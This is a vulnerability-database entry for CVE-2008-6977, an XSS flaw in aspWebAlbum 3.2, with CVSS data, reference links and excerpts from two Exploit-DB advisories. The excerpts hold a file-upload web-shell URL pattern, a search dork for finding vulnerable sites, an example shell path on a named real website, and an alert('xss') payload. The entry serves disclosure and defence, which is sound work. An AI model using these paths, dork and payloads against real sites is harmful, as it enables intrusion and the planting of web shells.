CVE-2008-6977
Published 2009-08-19
Priority: P4 19
Severity: medium, 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.75% (75.0th percentile)
Cross-site scripting (XSS) vulnerability in album.asp in Full Revolution aspWebAlbum 3.2 allows remote attackers to inject arbitrary web script or HTML via the message parameter in a summary action.
Affected: 1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fullrevolution | aspwebalbum | — | — |
No detection rules found.
Exploit-DB
aspwebalbum 3.2 - Multiple Vulnerabilities
exploitdb·2008-09-10
CVE-2008-6978 aspwebalbum 3.2 - Multiple Vulnerabilities
---
#################################################################################################
#
#-# Discovered by Alemin_Krali #
#
#-# aspWebAlbum 3.2 #
#
#-# Script Download "http://www.fullrevolution.com" #
#
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) #
#
#-# HomePage al3m.blogspot.com #
#
#-# [email protected] #
#
#-# Dork ? : album.asp?pic= .jpg cat= #
#
#
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell address: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2
Exploit-DB
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
exploitdb·2008-09-03
CVE-2008-6978 aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
---
##################################################################################################
#
#-# Discovered by Alemin_Krali alert('xss')&from=login #
#
#################################################################################################
# milw0rm.com [2008-09-03]
No writeups or analysis indexed.
http://osvdb.org/47915
http://secunia.com/advisories/31649
http://www.securityfocus.com/bid/30996
https://exchange.xforce.ibmcloud.com/vulnerabilities/44878
https://www.exploit-db.com/exploits/6357
https://www.exploit-db.com/exploits/6420
Published: 2009-08-19